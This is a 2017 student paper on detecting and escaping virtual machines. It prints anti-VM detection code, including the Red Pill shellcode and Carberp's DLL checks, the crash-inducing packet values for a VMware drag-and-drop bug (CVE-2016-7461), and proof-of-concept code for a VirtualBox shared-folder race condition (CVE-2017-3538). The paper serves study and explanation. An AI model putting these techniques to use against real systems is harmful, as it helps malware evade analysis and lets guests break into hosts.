Detection and Exploitation
ciao
Author:
Mattia Salvi
Latest revision:
12 September 2017
Insegnamento:
Crittografia
Docente:
Prof. Stelvio Cimato
3. 1 Introduction
This paper is an analysis of the current state of virtual machines’ security, showcasing how
features have been turned into attack vectors that can pose threats to real enterprise level
infrastructures. Despite the few real world scenarios that have actively exploited security
holes, they remain one of the most dangerous threats organizations have to look out for.
1.1 Staircase to Successful Exploitation
Despite the increasing attempts to publicly talk about offensive security, it is still a niche art
that often times leaves observers with the fundamental question of "how" it all happenes.
The techniques discussed in this paper revolve around the lower level aspects of computer
science therefore the reader is expected to have a certain degree of familiary with CPU
architectures, C and operating systems theory. The main focus of this writing are going to
be the first two points of the phases when trying to break out of a virtualized environment.
The vast majority of exploits chains can be broken down to these fundamental phases:
• Reconissance Phase: Determining the nature of the environment in which the pro-
cess is executing is the most important thing. Based upon the gathered data, decision
should be made in regards to how to behave. This means that if the necessary con-
disitions aren’t met, it is best to clean up the envinronment and exit. Anything that
the operating system reveals becomes precious in the later phases of the attack.
• Exploitation Phase: The attack surface is made of anything that can be used to
influence the host machine, ranging from vulnerable system calls to folders sharing
mechanisms. Memory corruption or even better, logical bugs are be leveraged in order
to get arbitrary code execution on the host machine. In order to take control of the
target it is necessary to hijack the execution flow and redirect it to your payload.
• Maintaining Persistance: In this phase there are quite alot of things an attacker can
do to gain persistance and stay undetected. Rootkits1
are one of the most effective
tools at the disposal of an intruder. It sohuld be taken into account though, that
modern operating systems have made their deployement much harder by making the
entire exploitation chain harder to pull off. Ever since code signing has ben added to
kernel mode drivers on top of exploit-mitigation features, staying in kernel space has
been a much harder task to accomplish than it used to. The astute reader may have
noticed that maintaining persistance is likely to involve the use of multiple exploits
and therefore, embodying the entire exploitation process in itself.
1A rootkit is a collection of computer software, designed to enable access to a computer or areas of its
software that would not otherwise be allowed (for example, to an unauthorized user) and often masks its
existence or the existence of other software
2
4. 2 Detecting Virtualized Environments
"You take the blue pill, the story ends. You wake up in your bed and believe whatever you
want to believe. You take the red pill, you stay in Wonderland, and I show you how deep
the rabbit hole goes." - Morpheus, Matrix
2.1 OS Sensitive Data Structures
An anti virtualization technique historically used, consisted in looking for the address of
Interrupt Descriptor Table2
in memory. In Windows XP this allowed any program to detect
the virtual machine and consequentially alter his behaviour.
1 IDT idt;
2 sidt(&idt);
3 if (idt.base <= 0x8003F400 || idt.base >= 0x80047400)
4 {
5 // Virtual Machine detected
6 return -1;
7 }
Windows XP as a counter measure, no longer place these sensitive data structures at
fixed addresses but instead use a random ones at boot time. Joanna Rutkowska used a
similar method that abused instead the fact that virtualizers placed these data structures
at fixed values therefore fully bypassing native OS address randomization.
1 int swallow_redpill () {
2 unsigned char m[2+4], rpill[] = " x0fx01x0dx00x00x00x00xc3 " ;
3 *((unsigned*)&rpill[3]) = (unsigned)m;
4 ((void(*)())&rpill)();
5 return (m[5]>0xd0) ? 1 : 0;
6 }
Despite the very cryptic form, all the function does is store the content of the IDTR register
and check the highest byte for specific values. This technique has an intrisic problem as the
IDT structure is per-core and as such will return a false posivite on multi processor systems.
In order to circumvent the aforementioned problems a slightly modified version has been
developed to work with the SGDT instructions, which return the same information for all
CPUs. Due to the hardening that Virtual Machines have gone throught throughout the
years these methods no longer work reliably.
Another less widely employed method consisted in measuring the time taken to exe-
cute instructions. Beyond certain boundaries the attacker can safely assume he/she is a
virtualized environment.
2.2 Virtual Machines Traces
Due to the way most virtualization software works, alot of traces are left in the forms of
running processes, files, registry keys. This used to be the bread and butter anti virtualiza-
tion technique. The leaked source code of Win32/Carberp shows what the malware authors
were trying to avoid: the trojan looks for a series of dlls and .sys files used respectively by
Parallels, Sandboxie and WinDbg.
1 bool DetectVM()
2 {
3 [...]
2OS running x86 architectures use this data structure to map interrupts to their handlers
3
5. 4 if(CheckDir(szBuf, "prleth.sys" )) return true;
5 [...]
6 if(GetModuleHandle("sbiedll.dll" )) return true;
7 if(GetModuleHandle("dbghelp.dll" )) return true;
8 [...]
9 }
As far as *nix system goes, the list of PCI devices reported by the virtualized hardware may
contain references to the virtualizing software
$ lspci -nn | grep VirtualBox
00:02.0 VGA compatible controller [0300]: InnoTek Systemberatung GmbH VirtualBox ...
00:04.0 System peripheral [0880]: InnoTek Systemberatung GmbH VirtualBox ...
Problems occuring with such a approach should be clear: on top of being relying on user
modifiable strings, it requires a continuos effort in identifying new PCI identifiers.
Similarly to PCIs, drivers that cannot reliably yeld fruitful results
$ lsmod | grep vbox
vboxvfs 35616 0
vboxvideo 3040 1
drm 193856 2 vboxvideo
vboxguest 170956 8 vboxvfs
2.3 Modern detection
When it comes to detecting virtualized environments, attackers find themselves with very
primitive tools and techniques that have long been fixed or patched. The reason high profile
attacks rarely make use of these shortcomings, is because of their very unstable nature
and their very limited capabilities. Tactics that rely on scanning the environment looking
for telltales are, on top of being doomed to generate alot of false positives, very likely to
have a short life span as they can be trivially patched. Moreover, when they do happen to
be working, they do so under very specific circumstences thus severely harming malwares’
ability to detect virtualized environments. All of the techniques showcased in this paper are
quite old, some of them even date back to 2004. They all work under the assumption that
the virtualized environment hasn’t gone throught any process of hardening which is still an
uncommon practice among researchers.
4
6. 3 Breaking Out of Virtualization
3.1 Sandboxes and Virtual Machines
Before continuing it is proper to make a distinction between what a sandbox and what a
virtual machine is: the two can achieve a similar goal in two very different ways. Due to
the way the execution contest interacts with the host operating system, a sandbox is much
more prone to security holes as it shares resources with the host OS. An analysis of how
sandboxes can be broken is out of the scope of this paper. The reason behind them having
such a fundamental difference is because they were created to address two different problems:
hardware limitations for vms and the restriction of environment for sandboxes.
3.2 VMware Escape: CVE-2016-7461
Hypervisors are just human-written programs and as such, contain all sorts of bugs that can
be turned into security holes. Here I decided to present two kinds of vulnerabilities, a logic
bug and a memory corruption. The difference between the two is clear. The former can
be found in every kind of language (such C, C++ or Python) because they are semantic
errors that lead to undefined behaviors. This is one of the favored attack vectors used as
they can be triggered with an extremely high reliability and are easier to maintain. The
latter cannot be carried out using interpreted languages as the only way to influence the
CPU is by overwriting sensitive values in use, thus hijacking code execution by redirecting
the program counter to unintended memory addresses.
CVE-2016-74613
is an out of bounds read/write vulnerability affecting the Drag and
Drop functionality. VMware’s security advisory:
“The drag-and-drop (DnD) function in VMware Workstation and Fusion has an
out-of-bounds memory access vulnerability. This may allow a guest to execute code on the
operating system that runs Workstation or Fusion. On Workstation Pro and Fusion, the
issue cannot be exploited if both the drag-and-drop function and the copy-and-paste (C&P)
function are disabled.”
As alot of past vulnerabilites, this one uses RPC4
protocol as attack vector to carry out the
first stage of the exploit.
3.2.1 RPC Protocol in VMware
In order to establish a comminucation channel between the host and the guest OS, VMware
uses an RPC interface called Backdoor.
Fortunately VMware’s open-vm-tools is open source, and can be used to ease analysis. The
functions used to communicate can be found in open-vm-tools/open-vm-tools/lib/include/rpcout.h
1 [...]
2 RpcOut *RpcOut_Construct(void);
3 void RpcOut_Destruct(RpcOut *out);
4 Bool RpcOut_start(RpcOut *out);
5 Bool RpcOut_send(RpcOut *out, char const *request, size_t reqLen,
6 Bool *rpcStatus, char const **reply, size_t *repLen);
7 Bool RpcOut_stop(RpcOut *out);
8 [...]
3The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly
known information-security vulnerabilities and exposures
4In distributed computing, a remote procedure call (RPC) is when a computer program causes a procedure
(subroutine) to execute in a different address space (commonly on another computer on a shared network),
which is coded as if it were a normal (local) procedure call, without the programmer explicitly coding the
details for the remote interaction.
5
7. VMware ships with rpctools.exe and it can be used to communicate over RPC. Taking
a look at the function’s inner workings with a disassembler we can find the following.
1 push esi
2 mov esi, [ebp+arg_0]
3 push eax
4 push ecx
5 push esi
6 call Message_Send
Message_Send is the function that calls Backdoor. Backdoor is exported in vmtools.dll and
is represented as follows.
1 arg_0= dword ptr 8
2
3 push ebp
4 mov ebp, esp
5 mov eax, [ebp+arg_0]
6 mov ecx, 5658h ; VMWare I/O Port
7 push eax
8 mov dword ptr [eax], 564D5868h ; Magic Number
9 mov [eax+0Ch], cx
10 call sub_412440 ; perform the actual input acquisition
11 add esp, 4
12 pop ebp
13 retn
The packets sent between the host and the guest are defined in .../dnd/dndCPMsgV4.h.
1 struct DnDCPMsgHdrV4 {
2 uint32 cmd; /* DnD/CP message command. */
3 uint32 type; /* DnD/CP message type. */
4 uint32 src; /* Message sender. */
5 uint32 sessionId; /* DnD/CP session ID. */
6 uint32 status; /* Status for last operation. */
7 uint32 param1; /* Optional parameter. Optional. */
8 uint32 param2; /* Optional parameter. Optional. */
9 uint32 param3; /* Optional parameter. Optional. */
10 uint32 param4; /* Optional parameter. Optional. */
11 uint32 param5; /* Optional parameter. Optional. */
12 uint32 param6; /* Optional parameter. Optional. */
13 uint32 binarySize; /* Binary size. */
14 uint32 payloadOffset; /* Payload offset. */
15 uint32 payloadSize; /* Payload size. */
16 }
The structure will be discussed more thorughtly later. Now that some familiarity is
gained with the way messages are sent by the guest OS, its time to take a look at how the
host OS handles RPC packets. The host machines in the case of the author of this paper
(Windows) uses vmware-vmx.exe to handle RPC requests.
3.2.2 Triggering the vulnerability
The decompiled code of the vulnerable functions applies the following sanity checks.
1 // ...
2 if (packet->packetSize < DND_CP_MSG_HEADERSIZE_V4)
3 return -1;
6
8. 4 // ...
5 if (packet->payloadSize > 0xFF64)
6 return -1;
7 // ...
8 if (packet->binarySize < 0x400000)
9 return -1;
10 // ...
11 if (packet->payloadOffset + packet->payloadSize < packet->binarySize)
12 return -1;
13 // ...
In order to trigger the vulnerability, the first step consists in sending a Drag and Drop
packet with specific values. This will make vmware-vmx.exe (host process) allocate a new
buffer. These values have been reported by McAfee researchers to be the most crash-inducing
ones.
packet->binarySize is 0x10000
packet->payloadOffset is 0x0
packet->payloadSize is 0x500
The final step in overwriting memory is to send a second slightly modified packet.
packet->binarySize is 0x10100
packet->payloadOffset is 0x500
packet->payloadSize is 0xFC00
Since the second packet has the same session id, the vmware-vmx.exe process won’t
allocate a new one, thus overwriting 0x100 bytes of memory. Althought this is not a fully
working exploit, this is the first step to achieving code execution on the host machine. As
such, elevated privileges have to be obtained via another exploit.
3.3 VirtualBox Escape: CVE-2017-3538
As said earlier this vulnerability won’t involve a corruption of values store in memory, but
will exploit the undeterministic access processes have towards resources when running on
a SMP5
system. A Google Security Researcher reported this vulnerability and provided
detailed information on how to reproduce the bug.
There is a security issue in the shared folder implementation that permits cooperating guests
with write access to the same shared folder to gain access to the whole filesystem of the host,
at least on Linux hosts.
3.3.1 Race Conditions
Race conditions are a class of software bugs in which the output of a given system relies
on the often uncontrollable timing and the order in which events occur, thus leading to
undefined behaviours. A Time Of Check Time To Use vulnerability consists in checking
in the lack of detection of changes between the checking of a condition and the use of the
result of that check.
3.3.2 Prerequisite
Before being able to trigger the vulnerability, it is mandatory to verify that certain conditions
are met. The Linux host must be running VirtualBox 5.1.10, the two Linux VMs must be
5Symmetric multiprocessing (SMP) involves a multiprocessor computer hardware and software architec-
ture where two or more identical processors are connected to a single, shared main memory, have full access
to all I/O devices, and are controlled by a single operating system instance that treats all processors equally,
reserving none for special purposes
7
9. equipped with the guest extension to enable shared folders and lastly share a writeable
folder. The vulnerable function is int "sf_reg_open(struct inode *inode, struct file *file)".
- rc = VbglR0SfCreate(&client_handle, &sf_g->map, sf_i->path, ¶ms);
+ copy = kmalloc(sizeof(*copy) + sf_i->path->u16Size, GFP_KERNEL);
+ memcpy(copy, sf_i->path, sizeof(*copy) + sf_i->path->u16Size);
+ if ((file->f_flags & O_CREAT) == 0) {
+ for (i=0; i<copy->u16Length; i++) {
+ if (copy->String.utf8[i] == '#' ) copy->String.utf8[i] = '/' ;
+ }
+ }
+ rc = VbglR0SfCreate(&client_handle, &sf_g->map, copy, ¶ms);
+ kfree(copy);
if (RT_FAILURE(rc))
The following patch checks whether the file exist. Due to the fact that sometimes renames
can occure during path traversal, by moving the file at the root of the shared folder, the VM
attempting to open the file can succefully access the host file system. In order to increase
the attack window, the time taken to travers the path should be maximized by creating as
many directories possible. This vulnerability can only be leveraged if the shared folder isn’t
9 levels away from the filesystem root.
3.3.3 Triggering the vulnerability
For the sake of brevity, only included the most relevant parts of the exploit. The first virtual
machine, the one that will attempt to access the file will execute the following code
1 system("rm -rf 0_" );
2 system("touch 0_#1#2#3#4#5#6#7#8#9#..#..#..#..#..#..#..#..#..#..#real_root_marker" );
3 system("mkdir -p 0/1/2/3/4/5/6/7/8/9/x" );
This the file we want to read and the shared folder are created. ’#’ are used as the the
patch converts them to ’/’.
1 // path = "0_/1/2/3/4/5/6/7/8/9/..#..#..#..#..#..#..#..#..#real_root_marker"
2 while (1) {
3 fd = open(path, O_RDONLY);
4 if (fd == -1 && errno != ENOENT)
5 perror("open" );
6 if (fd != -1) break;
7 }
The exploit will keep trying to access the file in the root directory and it will succeed
when the second virtual machine successfully moves the file to the root of the sared folder.
1 while (1) {
2 if (rename("0/1/2/3/4/5/6/7/8/9" , "0_" )) perror("rename a" );
3 if (rename("0_" , "0/1/2/3/4/5/6/7/8/9" )) perror("rename b" );
4 }
This proof of concept can easily be turned into a fully working exploit by leaking impor-
tant files or launching shells that can be later used as to escalate privileges.
8
10. 4 Conclusions
Unlinke sandboxes, which keep getting broken, hypervisors has proved to be an extremely
effective tool when it comes to isolating processes. Due to VMs nature, they’re not as easy
to demploy and thus can’t be fully leveraged outside of specific environments. Despite the
lack of proper virtualization detection techiniques malwares are still able to fight back in
what would otherwise be a dead end battle. The vast majority of the methods presented
here will fail if certain plugins aren’t installed, the machine goes through customization or
worse hardening. In regards to memory corruption vulnerabilites used to break out of them,
there are no incentives for anyone who holdes them to burn them in a large scale attack.
The only instance under which it is reasonable to assume multiple high value exploits are
used in the same attack are APTs6
. Stuxnet is attributed to government agencies as it used
4 different 0 days7
exploits.
6An advanced persistent threat is a set of stealthy and continuous computer hacking processes, often
orchestrated by a person or persons targeting a specific entity. An APT usually targets either private
organizations, states or both for business or political motives. APT processes require a high degree of
covertness over a long period of time. The "advanced" process signifies sophisticated techniques using
malware to exploit vulnerabilities in systems. The "persistent" process suggests that an external command
and control system is continuously monitoring and extracting data from a specific target. The "threat"
process indicates human involvement in orchestrating the attack.
7A zero-day (also known as zero-hour or 0-day or day zero) vulnerability is an undisclosed computer-
software vulnerability that hackers can exploit to adversely affect computer programs, data, additional
computers or a network.
9
11. References
[1] Wikipedia.
[2] Michael Sikorski and Andrew Honig. Practical Malware Analysis: The Hands-On Guide
to Dissecting Malicious Software by Michael Sikorski and Andrew Honig Mar 3, 2012
[3] Robert Love. Linux Kernel Development (3rd Edition) Jul 2, 2010
[4] Bruce Dang and Alexandre Gazet. Practical Reverse Engineering: x86, x64, ARM,
Windows Kernel, Reversing Tools, and Obfuscation Feb 17, 2014
[5] Chris Anley The Shellcoder’s Handbook: Discovering and Exploiting Security Holes Apr
2, 2004
10